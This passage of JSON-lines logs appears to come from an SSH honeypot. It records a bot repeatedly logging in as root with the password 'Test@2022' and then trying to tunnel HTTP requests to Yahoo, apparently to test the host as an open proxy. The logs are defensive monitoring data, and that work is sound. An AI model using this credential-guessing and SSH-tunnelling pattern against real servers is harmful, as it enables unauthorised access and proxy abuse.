{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.247857Z","src_ip":"213.209.150.239","session":"1ad7953e29f9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.305574Z","src_ip":"213.209.150.239","session":"1ad7953e29f9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50179,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cf1441a9658","protocol":"ssh","message":"New connection: 213.209.150.239:50179 (1.2.3.4:22) [session: 2cf1441a9658]","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.351701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.353115Z","src_ip":"213.209.150.239","session":"2cf1441a9658"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.400228Z","src_ip":"213.209.150.239","session":"2cf1441a9658"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.635110Z","src_ip":"213.209.150.239","session":"2cf1441a9658"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24567,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24567","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.683117Z","session":"2cf1441a9658"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.730639Z","src_ip":"213.209.150.239","session":"2cf1441a9658"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":19184,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19184","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.865596Z","session":"2cf1441a9658"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.912972Z","src_ip":"213.209.150.239","session":"2cf1441a9658"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.962140Z","src_ip":"213.209.150.239","session":"2cf1441a9658"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50214,"dst_ip":"1.2.3.4","dst_port":22,"session":"61247312c507","protocol":"ssh","message":"New connection: 213.209.150.239:50214 (1.2.3.4:22) [session: 61247312c507]","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.017761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.018690Z","src_ip":"213.209.150.239","session":"61247312c507"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.075410Z","src_ip":"213.209.150.239","session":"61247312c507"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.357633Z","src_ip":"213.209.150.239","session":"61247312c507"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26272,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26272","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.415131Z","session":"61247312c507"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.472324Z","src_ip":"213.209.150.239","session":"61247312c507"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":17591,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17591","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.627119Z","session":"61247312c507"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.684089Z","src_ip":"213.209.150.239","session":"61247312c507"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.741421Z","src_ip":"213.209.150.239","session":"61247312c507"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50257,"dst_ip":"1.2.3.4","dst_port":22,"session":"64a5fc5bdf70","protocol":"ssh","message":"New connection: 213.209.150.239:50257 (1.2.3.4:22) [session: 64a5fc5bdf70]","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.797111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.797896Z","src_ip":"213.209.150.239","session":"64a5fc5bdf70"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:57.854826Z","src_ip":"213.209.150.239","session":"64a5fc5bdf70"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.137373Z","src_ip":"213.209.150.239","session":"64a5fc5bdf70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":2067,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:2067","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.196189Z","session":"64a5fc5bdf70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.253485Z","src_ip":"213.209.150.239","session":"64a5fc5bdf70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":11231,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:11231","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.407049Z","session":"64a5fc5bdf70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.463743Z","src_ip":"213.209.150.239","session":"64a5fc5bdf70"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.521097Z","src_ip":"213.209.150.239","session":"64a5fc5bdf70"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50313,"dst_ip":"1.2.3.4","dst_port":22,"session":"57d47b8304e1","protocol":"ssh","message":"New connection: 213.209.150.239:50313 (1.2.3.4:22) [session: 57d47b8304e1]","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.576479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.577375Z","src_ip":"213.209.150.239","session":"57d47b8304e1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.633798Z","src_ip":"213.209.150.239","session":"57d47b8304e1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.915584Z","src_ip":"213.209.150.239","session":"57d47b8304e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28815,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28815","sensor":"my-vps","timestamp":"2025-08-26T00:54:58.972905Z","session":"57d47b8304e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.029503Z","src_ip":"213.209.150.239","session":"57d47b8304e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":1477,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:1477","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.182971Z","session":"57d47b8304e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.239455Z","src_ip":"213.209.150.239","session":"57d47b8304e1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.296885Z","src_ip":"213.209.150.239","session":"57d47b8304e1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50361,"dst_ip":"1.2.3.4","dst_port":22,"session":"78c18ea3c0b3","protocol":"ssh","message":"New connection: 213.209.150.239:50361 (1.2.3.4:22) [session: 78c18ea3c0b3]","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.352779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.354603Z","src_ip":"213.209.150.239","session":"78c18ea3c0b3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.411431Z","src_ip":"213.209.150.239","session":"78c18ea3c0b3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.693882Z","src_ip":"213.209.150.239","session":"78c18ea3c0b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":104,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:104","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.751538Z","session":"78c18ea3c0b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.808503Z","src_ip":"213.209.150.239","session":"78c18ea3c0b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":26232,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26232","sensor":"my-vps","timestamp":"2025-08-26T00:54:59.963074Z","session":"78c18ea3c0b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.019863Z","src_ip":"213.209.150.239","session":"78c18ea3c0b3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.078642Z","src_ip":"213.209.150.239","session":"78c18ea3c0b3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50400,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfaf19d8b249","protocol":"ssh","message":"New connection: 213.209.150.239:50400 (1.2.3.4:22) [session: cfaf19d8b249]","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.124755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.125861Z","src_ip":"213.209.150.239","session":"cfaf19d8b249"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hel